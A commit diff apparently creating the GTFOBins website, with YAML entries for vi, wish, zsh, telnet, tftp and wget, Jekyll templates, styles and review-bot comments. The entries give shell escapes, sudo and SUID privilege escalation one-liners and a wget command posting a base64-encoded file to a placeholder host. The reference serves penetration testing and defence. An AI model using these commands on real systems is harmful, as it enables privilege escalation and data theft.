||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
suid-limited:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
./telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
---
|
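Review bot: The three interactive examples set `RHOST=www.google.com` and `RPORT=80`, pointing a published example at a third-party host, whereas every other file in this commit uses the placeholder `10.0.0.1`; `RHOST=10.0.0.1` keeps the example self-contained. The `description: MacOS only.` key is placed after `code` in each item, while `contribute.md` documents `description` before `code`; YAML does not care, but moving it up keeps the files uniform.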
15
_gtfobins/tftp.md
Normal file
15
_gtfobins/tftp.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
tftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a TFTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
tftp $RHOST
|
||||
get file_to_get
|
||||
---
|
13
_gtfobins/vi.md
Normal file
13
_gtfobins/vi.md
Normal file
@ -0,0 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: vi -c ':!/bin/sh'
|
||||
- code: |
|
||||
vi
|
||||
:set shell=/bin/sh
|
||||
:shell
|
||||
sudo-enabled:
|
||||
- code: sudo vi -c ':!/bin/sh'
|
||||
suid-enabled:
|
||||
- code: ./vi -c ':!/bin/sh -p'
|
||||
---
|
15
_gtfobins/wget.md
Normal file
15
_gtfobins/wget.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
wget $URL -O $LFILE
|
||||
---
|
11
_gtfobins/wish.md
Normal file
11
_gtfobins/wish.md
Normal file
@ -0,0 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
---
|
9
_gtfobins/zsh.md
Normal file
9
_gtfobins/zsh.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: zsh
|
||||
sudo-enabled:
|
||||
- code: sudo zsh
|
||||
suid-enabled:
|
||||
- code: ./zsh
|
||||
---
|
57
_includes/bin_table.html
Normal file
57
_includes/bin_table.html
Normal file
@ -0,0 +1,57 @@
|
||||
<input id="bin-search" type="text" placeholder="Filter by name, just start typing..."/>
|
||||
|
||||
<div id="bin-table-wrapper">
|
||||
<table id="bin-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Binary</th>
|
||||
<th>Functions</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
{% for file in site.gtfobins %}
|
||||
<tr>
|
||||
<td><a href="{{ file.url }}" class="bin-name">{% include get_bin_name path=file.path %}</a></td>
|
||||
<td>{% include function_list.html bin=file %}</td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</tbody>
|
||||
<tfoot>
|
||||
<tr><td id="search-message" colspan="2">No binary matches...</td></tr>
|
||||
</tfoot>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
var searchBox = document.querySelector('#bin-search');
|
||||
var searchMessage = document.querySelector('#search-message');
|
||||
searchMessage.style.display = 'none';
|
||||
|
||||
// ensure height during filtering
|
||||
var binTableWrapper = document.querySelector('#bin-table-wrapper');
|
||||
binTableWrapper.style.height = binTableWrapper.clientHeight + 'px';
|
||||
|
||||
searchBox.addEventListener('input', function () {
|
||||
var query = searchBox.value.toLowerCase().trim();
|
||||
var noResults = true;
|
||||
|
||||
document.querySelectorAll('#bin-table tbody tr').forEach(function (row) {
|
||||
var binName = row.firstElementChild.firstElementChild.innerText;
|
||||
if (binName.indexOf(query) !== -1) {
|
||||
row.style.display = '';
|
||||
noResults = false;
|
||||
} else {
|
||||
row.style.display = 'none';
|
||||
}
|
||||
});
|
||||
|
||||
searchMessage.style.display = noResults ? '' : 'none';
|
||||
});
|
||||
|
||||
addEventListener('keydown', function (event) {
|
||||
if (event.key.toLowerCase().match(/^[a-z]$/)) {
|
||||
searchBox.focus();
|
||||
}
|
||||
});
|
||||
|
||||
</script>
|
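Review bot: The filter lowercases `query` but compares it against `binName` exactly as read from `innerText`, so any binary whose link text contains an uppercase letter would never match a lowercase search; `var binName = row.firstElementChild.firstElementChild.innerText.toLowerCase();`. The global `keydown` handler focuses the search box on any single letter, which is fine while this is the page's only input but would steal keystrokes from any other field added later; a one-line comment recording that assumption would help the next editor.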
6
_includes/function_list.html
Normal file
6
_includes/function_list.html
Normal file
@ -0,0 +1,6 @@
|
||||
<ul class="function-list">
|
||||
{% for function in include.bin.functions %}
|
||||
{% assign type = function[0] %}
|
||||
<li><a href="{{ include.bin.url }}#{{ type }}">{{ site.data.functions[type].label }}</a></li>
|
||||
{% endfor %}
|
||||
</ul>
|
7
_includes/functions_description.html
Normal file
7
_includes/functions_description.html
Normal file
@ -0,0 +1,7 @@
|
||||
<dl>
|
||||
{% for function_pair in site.data.functions %}
|
||||
{% assign function = function_pair[1] %}
|
||||
<dt class="function-name">{{ function.label }}</dt>
|
||||
<dd>{{ function.description | markdownify }}</dd>
|
||||
{% endfor %}
|
||||
</dl>
|
1
_includes/get_bin_name
Normal file
1
_includes/get_bin_name
Normal file
@ -0,0 +1 @@
|
||||
{% assign fn_parts = include.path | split: '/' | last | split: '.' %}{% assign fn_parts_size = fn_parts | size %}{% if fn_parts_size < 3 %}{{- fn_parts[0] -}}{% else %}{{- fn_parts[0] -}}.{{- fn_parts[1] -}}{% endif %}
|
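Review bot: The name is reconstructed from at most the first two dot-separated parts, so a file such as `a.b.c.md` would be displayed as `a.b`; since the `.md` suffix is always the last part, removing it and joining whatever remains handles any number of dots, e.g. `{{ fn_parts | pop | join: '.' }}` if the site's Jekyll provides the `pop` array filter. A short comment stating that the include turns `_gtfobins/ld.so.md` into `ld.so` would make the intent clear.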
6
_includes/page_title.html
Normal file
6
_includes/page_title.html
Normal file
@ -0,0 +1,6 @@
|
||||
<h1>
|
||||
{% if page.url != '/' %}
|
||||
<a href="/">..</a> /
|
||||
{% endif %}
|
||||
{{ include.title }}
|
||||
</h1>
|
46
_layouts/bin.html
Normal file
46
_layouts/bin.html
Normal file
@ -0,0 +1,46 @@
|
||||
---
|
||||
layout: common
|
||||
---
|
||||
|
||||
{% capture bin_name %}{% include get_bin_name path=page.path %}{% endcapture %}
|
||||
|
||||
{% include page_title.html title=bin_name %}
|
||||
|
||||
{% include function_list.html bin=page %}
|
||||
|
||||
{{ page.description | markdownify }}
|
||||
|
||||
{% for function in page.functions %}
|
||||
|
||||
{% assign function_name = function[0] %}
|
||||
{% assign examples = function[1] %}
|
||||
|
||||
<h2 id="{{ function_name }}" class="function-name">
|
||||
{{- site.data.functions[function_name].label -}}
|
||||
</h2>
|
||||
|
||||
{{ site.data.functions[function_name].description | markdownify }}
|
||||
|
||||
{% for example in examples %}
|
||||
|
||||
<div class="example">
|
||||
{{ example.description | markdownify }}
|
||||
|
||||
{% capture code %}
|
||||
{%- if function_name == 'suid-enabled' or function_name == 'suid-limited' %}
|
||||
cp $(which {{ bin_name }}) .
|
||||
sudo chown 0 ./{{ bin_name }}
|
||||
sudo chmod +s ./{{ bin_name }}
|
||||
{% endif %}
|
||||
{{ example.code }}
|
||||
{% endcapture %}
|
||||
|
||||
<pre><code>
|
||||
{{- code | strip -}}
|
||||
</code></pre>
|
||||
|
||||
</div>
|
||||
|
||||
{% endfor %}
|
||||
|
||||
{% endfor %}
|
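Review bot: `{{ example.code }}` and the captured SUID preamble are written inside `<pre><code>` without escaping, so examples containing `<`, `>` or `&` (the `/dev/tcp` redirections in `bash.md`, `<@stdin >@stdout 2>@stderr` in `tclsh.md` and `wish.md`) are handed to the browser as markup and render incorrectly; `{{- code | strip | xml_escape -}}`. The `markdownify` calls on the descriptions already produce HTML, so only the code path needs the change.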
22
_layouts/common.html
Normal file
22
_layouts/common.html
Normal file
@ -0,0 +1,22 @@
|
||||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<title>
|
||||
{{ site.title }}
|
||||
{% if page.url != '/' %}
|
||||
|
|
||||
{% if page.layout == 'bin' %}
|
||||
{{ page.title | downcase }}
|
||||
{% else %}
|
||||
{{ page.title }}
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
</title>
|
||||
<link rel="stylesheet" href="/style.css" type="text/css"/>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=yes">
|
||||
</head>
|
||||
<body>
|
||||
{{ content }}
|
||||
</body>
|
||||
</html>
|
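Review bot: The `<title>` block reads `page.title`, but none of the `_gtfobins/*.md` files in this commit sets `title` in its front matter (the visible name is derived in `_layouts/bin.html` from the file path), so every binary page gets a `<title>` containing only the site name. Either add `title` to each binary's front matter or compute the name here the same way, e.g. `{% include get_bin_name path=page.path %}` in place of `{{ page.title | downcase }}` inside the `page.layout == 'bin'` branch.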
7
_layouts/page.html
Normal file
7
_layouts/page.html
Normal file
@ -0,0 +1,7 @@
|
||||
---
|
||||
layout: common
|
||||
---
|
||||
|
||||
{% include page_title.html title=page.title %}
|
||||
|
||||
{{ content }}
|
45
contribute.md
Normal file
45
contribute.md
Normal file
@ -0,0 +1,45 @@
|
||||
---
|
||||
layout: page
|
||||
title: Contribute
|
||||
---
|
||||
|
||||
## Structure
|
||||
|
||||
Each GTFO binary is defined in a file in the `_gtfobins/` folder named as `<binary name>.md`, such file consists only of a [YAML] front matter which describes the binary and its functions.
|
||||
|
||||
[YAML]: http://yaml.org/
|
||||
|
||||
The full syntax is the following:
|
||||
|
||||
```
|
||||
description: Optional description of the binary
|
||||
functions:
|
||||
FUNCTION:
|
||||
- description: Optional description of the example
|
||||
code: Code of the example
|
||||
- ....
|
||||
FUNCTION:
|
||||
- description: Optional description of the example
|
||||
code: Code of the example
|
||||
- ...
|
||||
...
|
||||
```
|
||||
|
||||
Where `FUNCTION` is one of the values described in the `_data/functions.yml` file.
|
||||
|
||||
Feel free to use any file in the `_gtfobins/` folder as an example.
|
||||
|
||||
Pull request process
|
||||
--------------------
|
||||
|
||||
Vendor software is accepted as well as standard Unix binaries. Binaries and techniques that only works on certain operating systems and versions are accepted and such limitations shall be noted in the `description` field.
|
||||
|
||||
Before sending a pull request of a new binary or function, ensure the following:
|
||||
|
||||
1. Verify the function works on at least one type of modern Unix system.
|
||||
2. Classifying SUID-related functions may be tricky because they depend on how the default shell behaves on different systems (i.e. Ubuntu vs. Debian) and how the external command is called (i.e. `exec()` family vs. `system()`). Check how the binary behaves:
|
||||
- The function is considered `suid-enabled` if runs external commands with SUID privileges on Ubuntu Linux.
|
||||
- The function is considered `suid-limited` if runs external commands with SUID privileges on Debian but it drops the privileges on Ubuntu Linux.
|
||||
3. Verify `sudo-enabled` function runs external commands under the `sudo` privileged context.
|
||||
|
||||
Pull requests adding new functions in `_data/functions.yml` are allowed and subjected to project maintainers vetting.
|
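--- a/functions.md
+++ b/functions.md
@@ -0,0 +1,8 @@
+---
+layout: page
+title: Functions
+---
+
+A binary may support one or more of the following functions:
+
+{% include functions_description.html %}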
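--- a/index.md
+++ b/index.md
@@ -0,0 +1,16 @@
+---
+layout: page
+title: GTFOBins
+---
+
+GTFOBins is a curated list of Unix binaries that can be leveraged by an attacker to bypass system security restrictions.
+
+This was inspired by the [LOLBins and LOLScripts](https://github.com/api0cradle/LOLBAS) project for Windows environment.
+
+The project collects legitimate Unix binaries that can be abused to <strike>get the f**k</strike> break out restricted shells, escalate or maintain elevated privileges, download or exfiltrate files, and facilitate the other post-exploitation tasks outlined [here](/functions/).
+
+GTFOBins aims to be a shared project where everyone can contribute with additional binaries and techniques. You can find detailed instructions [here](/contribute/).
+
+## List of GTFOBins
+
+{% include bin_table.html %}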
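--- a/style.scss
+++ b/style.scss
@@ -0,0 +1,117 @@
+---
+---
+
+$accent: #bf0707;
+$lighter: #fff4f4;
+$hover: #ff0000;
+
+// layout
+
+@media (min-width: 1000px) {
+body {
+width: 800px;
+margin: 0 auto;
+}
+}
+
+// common tags
+
+body {
+font-family: sans, sans-serif;
+}
+
+code {
+padding: 0.15em 0.25em;
+border-radius: 0.25em;
+color: $accent;
+background: $lighter;
+}
+
+pre {
+background: $lighter;
+padding: 1em;
+overflow-x: auto;
+
+code {
+padding: 0;
+border-radius: 0;
+}
+}
+
+a:link, a:visited {
+color: $accent;
+}
+
+a:hover {
+color: $hover;
+}
+
+// fragment targets
+
+*:target {
+border-left: 5px solid $accent;
+padding-left: 5px;
+}
+
+// binary list and search
+
+#bin-search {
+padding: 0.5em;
+width: 100%;
+box-sizing: border-box;
+}
+
+#bin-table {
+width: 100%;
+
+th, td {
+padding: 0.2em 1em;
+}
+
+th {
+text-align: left;
+}
+
+#search-message {
+text-align: center;
+padding: 1em;
+}
+}
+
+// function description
+
+.function-list {
+font-size: 0.8rem;
+list-style: none;
+padding: 0;
+margin: 0;
+
+li {
+display: inline-block;
+padding: 0.25em 0.5em;
+margin: 0.05em 0;
+border: 1px solid $accent;
+
+a:link, a:visited {
+color: $accent;
+text-decoration: none;
+}
+
+&:hover, a:hover {
+color: $hover;
+border-color: $hover;
+}
+}
+}
+
+// classes
+
+.bin-name {
+font-family: monospace;
+font-size: 1.2rem;
+}
+
+.function-name {
+font-size: 1.4rem;
+font-weight: bold;
+}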
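Review bot: The link highlight rules in the `a:hover` block and in the `.function-list li` `&:hover, a:hover` block only react to the pointer, so keyboard users tabbing through the binary table and function tags get no visible indication of the focused link; extending the selectors to `a:hover, a:focus` and `&:hover, a:hover, a:focus` keeps the same colours and restores that cue. Separately, `font-family: sans, sans-serif;` names a specific family `sans` that most platforms do not define, so the generic `sans-serif` fallback is what actually renders; dropping the first entry (or replacing it with a real family name) makes the intent explicit.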